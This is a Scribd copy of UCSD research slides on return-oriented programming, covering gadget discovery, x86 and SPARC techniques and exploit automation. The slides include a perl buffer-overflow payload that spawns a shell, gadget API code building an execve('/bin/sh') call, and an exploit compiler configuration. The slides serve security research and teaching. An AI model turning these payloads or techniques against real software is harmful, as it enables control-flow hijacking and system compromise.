0% found this document useful (0 votes)
56 views53 pages

Return-Oriented Programming: Exploitation Without Code Injection

Return-oriented programming allows an attacker to execute arbitrary computation on a target system without injecting or executing any code. It works by chaining together small snippets of existing code (called "gadgets") that end in returns, manipulating the stack pointer to cause these snippets to execute sequentially. This technique undermines many security systems by making code injection unnecessary. It is Turing complete and can implement any computation given a sufficiently large codebase to draw gadgets from, such as a library like libc.

Uploaded by

Rekha
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
56 views53 pages

Return-Oriented Programming: Exploitation Without Code Injection

Return-oriented programming allows an attacker to execute arbitrary computation on a target system without injecting or executing any code. It works by chaining together small snippets of existing code (called "gadgets") that end in returns, manipulating the stack pointer to cause these snippets to execute sequentially. This technique undermines many security systems by making code injection unnecessary. It is Turing complete and can implement any computation given a sufficiently large codebase to draw gadgets from, such as a library like libc.

Uploaded by

Rekha
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 53

Return-oriented Programming:

Exploitation without Code Injection


Erik Buchanan, Ryan Roemer, Stefan Savage, Hovav Shacham
University of California, San Diego
Bad code versus bad behavior

“Bad”
Bad “Good”
Good
behavior behavior

Attacker Application
d
code d
code

Problem: this implication is


false!
The Return
Return-oriented
oriented programming thesis

any sufficiently large program codebase

arbitrary attacker computation and behavior,


without code injection

(in the absence of control-flow integrity)


Security systems endangered:
` W-xor-X aka DEP
` Linux, OpenBSD
Linux OpenBSD, Windows XP SP2
SP2, MacOS X
` Hardware support: AMD NX bit, Intel XD bit
` Trusted computing
p g
` Code signing: Xbox
` Binary hashing: Tripwire, etc.
` … and others
Return-into-libc and W^X
W xor X
W-xor-X
` Industry response to code injection exploits
` Marks all writeable locations in a process’
process address
space as nonexecutable
` Deployment:
p y Linux ((via PaX p
patches);
); OpenBSD;
p ;
Windows (since XP SP2); OS X (since 10.5); …
` Hardware support: Intel “XD” bit, AMD “NX” bit
(and many RISC processors)
Return into libc
Return-into-libc
` Divert control flow of exploited program into libc code
` system() printf(),
system(), printf() …
` No code injection required

` Perception of return-into-libc: limited, easy to defeat


` Attacker cannot execute arbitrary code
` Attacker relies on contents of libc — remove system()?

` We show: this perception is false.


The Return-oriented programming thesis:
return-into-libc
return into libc special case

attacker control of stack

arbitrary attacker computation and behavior


via return-into-libc techniques

(given any sufficiently large codebase to draw on)


Our return
return-into-libc
into libc generalization
` Gives Turing-complete exploit language
` exploits aren’t
aren t straight
straight-line
line limited
` Calls no functions at all
` can’t be defanged
g byy removingfunctions
g like system()
y ()
` On the x86, uses “found” insn sequences, not code
intentionally placed in libc
` difficult to defeat with compiler/assembler changes
Return-oriented
Return oriented programming

connect back to attacker again:
g …
while socket not eof movi(s), chdecri
read line cmpch, ‘|’ jnz again
fork, exec named progs jeq pipe …

stack: libc:

load decr
?
cmp jnz

? jeq
Related Work
` Return-into-libc: Solar Designer, 1997
` Exploitation without code injection
` Return-into-libc chaining with retpop: Nergal, 2001
` Function returns into another, with or without frame
pointer
` Register springs, dark spyrit, 1999
` Find unintended “jmp %reg” instructions in program text
` Borrowed code chunks, Krahmer 2005
` Look for short code sequences ending in “ret”
ret
` Chain together using “ret”
Mounting attack
` Need control of memory around %esp
` Rewrite stack:
` Buffer overflow on stack
` Format stringg vuln to rewrite stack contents
` Move stack:
` Overwrite saved frame pointer on stack;
on leave/ret, move %esp to area under attacker control
` Overflow function pointer to a register spring for %esp:
` set or modify %esp from an attacker
attacker-controlled
controlled register
` then return
Principles of
return-oriented programming
p g g
Ordinary programming: the machine level

` Instruction pointer (%eip) determines which


instruction to fetch & execute
` Once
O ce processor
p ocesso has as e
executed
ecu ed the
e instruction,
s uc o , it
automatically increments %eip to next instruction
` Control flow by changing value of %eip
Return-oriented programming:
the machine level

` Stack pointer (%esp) determines which instruction


sequence to fetch & execute
` Processor doesn’t automatically increment %esp; — but
the “ret” at end of each instruction sequence does
No ops
No-ops

` No-op instruction
N i t ti does d nothing
thi b butt advance
d %
%eip
i
` Return-oriented equivalent:
` point to return instruction
` advances %esp
` Useful
Use u in nop
op s
sled
ed
Immediate constants

` Instructions can encode constants


` Return-oriented equivalent:
` Store on the stack;
` Pop into register to use
Control flow

` Ordinary programming:
` (Conditionally) set %eip to new value
` Return-oriented equivalent:
` (C di i
(Conditionally)
ll ) set %
%esp to new value
l
Gadgets: multiple instruction sequences

` Sometimes more than one instruction sequence


needed to encode logical unit
` Example: load from memory into register:
` Load address of source word into %eax
` Load memory at (%eax) into %ebx
A Gadget Menagerie
Gadget design
` Testbed: libc-2.3.5.so, Fedora Core 4
` Gadgets built from found code sequences:
` load-store
` arithmetic &logic
` control
t l flow
fl
` system calls
` Challenges:
` Code sequences are challenging to use:
` short; perform a small unit of work
` no standard function prologue/epilogue
` haphazard interface, not an ABI
` Some convenient instructions not always available (e.g.,
lahf)
“The
The Gadget”:
Gadget : July 1945
Immediate rotate of memory word
Conditional jumps on the x86
` Many instructions set %eflags
` But the conditional jump insns perturb %eip
%eip, not
%esp
` Our strategy:
gy
` Move flags to general-purpose register
` Compute either delta (if flag is 1) or 0 (if flag is 0)
` Perturb %esp by the computed amount
Conditional jump, phase 1: load CF

(As a side effect, neg sets


CF if its argument is
nonzero)
Conditional jump, phase 2:
store CF to memory
Computed jump, phase 3:
compute delta
delta-or-zero
or zero

Bitwise and with delta


(in %esi)

2s-complement
negation:
0 becomes 0…0;;
1 becomes 1…1
Computed jump, phase 4:
perturb %esp using computed delta
Finding instruction sequences

(on the x86)


Finding instruction sequences
` Any instruction sequence ending in “ret” is useful —
could be part of a gadget

` Algorithmic
g problem:
p recover all sequences
q of valid
instructions from libc that end in a “ret” insn
` Idea: at each ret (c3 byte) look back:
` are preceding i bytes a valid length-iinsn?
` recursefrom found instructions
` C ll t iinstruction
Collect t ti sequences iin a trie
ti
Unintended instructions — ecb_crypt()
ecb crypt()
c7
45
d4
movl $0x00000001, - 01
44(%ebp) 00
00
00
add %dh, %bh
f7
c7
07
test $0x00000007, 00
%edi movl $0x0F000000,
00 (%edi)
00
0f
95 } xchg %ebp, %eax
setnzb -61(%ebp) 45 } inc%ebp
c3 } ret
Is return-oriented programming
x86-specific?
p
(Spoiler: Answer is no.)
Assumptions in original attack
` Register-memory machine
` Gives p
plentiful opportunities
pp for accessing
g memory
y
` Register-starved
` Multiple sequences likely to operate on same register
` I
Instructions
i are variable-length,
i bl l h unaligned
li d
` More instruction sequences exist in libc
` Instructions types not issued by compiler may be
available
` Unstructured call/ret ABI
` A sequence ending
Any di iin a return
t iis useful
f l

` True on the x86 … not on RISC architectures


SPARC: the un
un-x86
x86
` Load-store RISC machine
` Only a few special instructions access memory
` Register-rich
` 128 registers;
g 32 available to any
yggiven function
` All instructions 32 bits long; alignment enforced
` No unintended instructions
` Highly structured calling convention
` Register windows
` St k frames
Stack f have
h specific
ifi fformatt
Return-oriented
Return oriented programming on SPARC
` Use Solaris 10 libc: 1.3 MB
` New techniques:
` Use instruction sequences that are suffixes of real
functions
` Dataflow within a gadget:
` Use structured dataflow to dovetail with calling convention
` Dataflow between gadgets:
` Each gadget is memory-memory
` Turing-complete computation!

` Conjecture: Return-oriented programming likely


possible on every architecture.
SPARC Architecture

` Registers:
` %i[0-7], %l[0-7], %o[0-7]
` g
Register banks and the
“sliding register window”
` “call; save”;
“ret;
ret; restore
restore”
SPARC Architecture

` Stack
` Frame Ptr: %i6/%fp
` Stack Ptr: %o6/%spp
` Return Addr: %i7
` Register save area
Dataflow strategy
` Via register
` On restore,
restore %i registers become %o registers
` First sequence puts output in %i register
` Second sequence reads from corresponding %o register
` Write into stack frame
` On restore, spilled %i, %l registers read from stack
` Earlier sequence writes to spill space for later sequence
Gadget operations implemented
` Memory ` Math ` Control Flow
` v1 = &v2 ` v1++ ` BA: jjumpp T1
` v1 = *v2 ` v1-- ` BE: if (v1 == v2):
` *v1 = v2 ` v1 = -v2 ` jump T1,
` A i
Assignment
t ` v1 = v2 + v3 ` else T2

` v1 = Value ` v1 = v2 - v3 ` BLE: if (v1 <=


v2):
` v1 = v2 ` Logic
g ` jump T1
T1,
` Function Calls ` v1 = v2 & v3 ` else T2
` call Function ` v1 = v2 | v3 ` BGE: if (v1 >=
` S t
System Calls
C ll ` v1 = ~v2 v2):
2)
` call syscall ` jump T1,
with ` else T2
arguments
Gadget: Addition
` v1 = v2 + v3
Gadget: Branch Equal

if (v1 == v2):
jump T1
else:
jump T2
Automation
Option 1: Write your own
` Hand-coded gadget
layout
linux-x86% ./target `perl
-e ‘print “A”x68, pack("c*”,
0x3e,0x78,0x03,0x03,0x07,
0x7f,0x02,0x03,0x0b,0x0b,
f b b
0x0b,0x0b,0x18,0xff,0xff,
0x4f,0x30,0x7f,0x02,0x03,
0x4f,0x37,0x05,0x03,0xbd,
0xad,0x06,0x03,0x34,0xff,
0xff,0x4f,0x07,0x7f,0x02,
0x03,0x2c,0xff,0xff,0x4f,
0x30,0xff,0xff,0x4f,0x55,
0xd7,0x08,0x03,0x34,0xff,
0xff,0x4f,0xad,0xfb,0xca,
0xde,0x2f,0x62,0x69,0x6e,
, , , )
0x2f,0x73,0x68,0x0)'`
sh-3.1$
Option 2: Gadget API
/* Gadget variable declarations */
g_var_t *num = g_create_var(&prog, "num");
g var t *arg0a
* 0 = g create
t var(&prog,
(& "
"arg0a");
0 ")
g_var_t *arg0b = g_create_var(&prog, "arg0b");
g_var_t *arg0Ptr = g_create_var(&prog, "arg0Ptr");
g var t *arg1Ptr
arg1Ptr = g create var(&prog,
var(&prog "arg1Ptr");
arg1Ptr );
g_var_t *argvPtr = g_create_var(&prog, "argvPtr");
/* Gadget variable assignments (SYS_execve = 59)*/
g assign
g const(&prog,
p g num, 59);
g_assign_const(&prog, arg0a, strToBytes("/bin"));
g_assign_const(&prog, arg0b, strToBytes("/sh"));
g_assign_addr( &prog, arg0Ptr, arg0a);
g_assign_const(&prog, arg1Ptr, 0x0); /* Null */
g_assign_addr( &prog, argvPtr, arg0Ptr);
/* Trap to execve */
g syscall(&prog, num, arg0Ptr, argvPtr, arg1Ptr,NULL, NULL, NULL);
Gadget API compiler
` Describe program to attack:
char *vulnApp= "./demo-vuln"; /* Exec name of vulnerable app. */
intvulnOffset 336;
intvulnOffset= /* Offset to %i7 in overflowed frame.
frame */
intnumVars = 50; /* Estimate: Number of gadget variables */
intnumSeqs = 100; /* Estimate: Number of inst. seq's (packed) */
/* Create and Initialize Program *************************************** */
init(&prog, (uint32_t) argv[0], vulnApp, vulnOffset, numVars, numSeqs);

` Compiler creates program to exploit vuln app


` Overflow in argv[1]; return-oriented payload in env
` Compiler avoids NUL bytes

(7 gadgets,
gadgets 20 sequences
sparc@sparc #./exploit
336 byte overflow $
1280 byte payload)
Option 3: Return
Return-oriented
oriented compiler
` Gives high-level interface to gadget API
` Same shellcode as before:

vararg0 = "/bin/sh";
/bin/sh ;
vararg0Ptr = &arg0;
vararg1Ptr = 0;

trap(59,
p( , &arg0,
g , &(arg0Ptr),
( g ), NULL);
);
Return-oriented
Return oriented selection sort — I
vari, j, tmp, len = 10;
var* min, p1, p2, a; // Pointers

srandom(time(0)); // Seed random()


a = malloc(40); // a[10]
p1 = a;
printf(&("Unsorted Array:\n"));
f
for (i = 0;
0 i<len;
i l ++i)
i) {
// Initialize to small random values
*p1 = random() & 511;
printf(&("%d, "), *p1);
p1 = p1 + 4; // p1++
}
Return-oriented
Return oriented selection sort — II
p1 = a;
; i< (len - 1);
for (i = 0; ; ++i) {
min = p1;
p2 = p1 + 4;
for (j = (i + 1); j<len; ++j) {
if (*p2 < *min) { min = p2; }
p2 = p2 + 4; // p2++
}
// Swap p1 <-> min
tmp = *p1; *p1 = *min; *min = tmp;
p1 = p1 + 4; // p1++
}
Return-oriented
Return oriented selection sort — III
p1 = a;
printf(&("\n\nSorted Array:\n"));
for (i = 0; i<len; ++i) {
printf(&("%d
printf(&( %d, ")
), *p1);
p1);
p1 = p1 + 4; // p1++
}
printf(&("\n"));
( );
free(a); // Free Memory
y
Selection sort — compiler output
` 24 KB payload: 152 gadgets, 381 instruction
sequences
` No code injection!
sparc@sparc# /SelectionSort
sparc@sparc#./SelectionSort

Unsorted Array:
486 491
486, 491, 37,
37 5,
5 166,
166 330,
330 103,
103 138,
138 233,
233 169,
169

Sorted Array:
5 37
5, 37, 103,
103 138,
138 166,
166 169,
169 233,
233 330,
330 486,
486 491,
491
Wrapping up
Conclusions
` Code injection is not necessary for arbitrary
exploitation
` Defenses that distinguish “good code” from “bad
code” are useless
` Return-oriented programming likely possible on
every architecture, not just x86
` Compilers make sophisticated return-oriented
exploits easy to write
Questions?

H. Shacham
H Shacham. “The
The geometry of innocent flesh on the
bone: Return-into-libc without function calls (on the
x86).”
) In Proceedings g of CCS 2007,, Oct. 2007.
E. Buchanan, R. Roemer, S. Savage, and H.
Shacham. “When Good Instructions Go Bad:
Generalizing Return-Oriented Programming to
RISC.” In submission, 2008.

http://cs.ucsd.edu/~hovav/

You might also like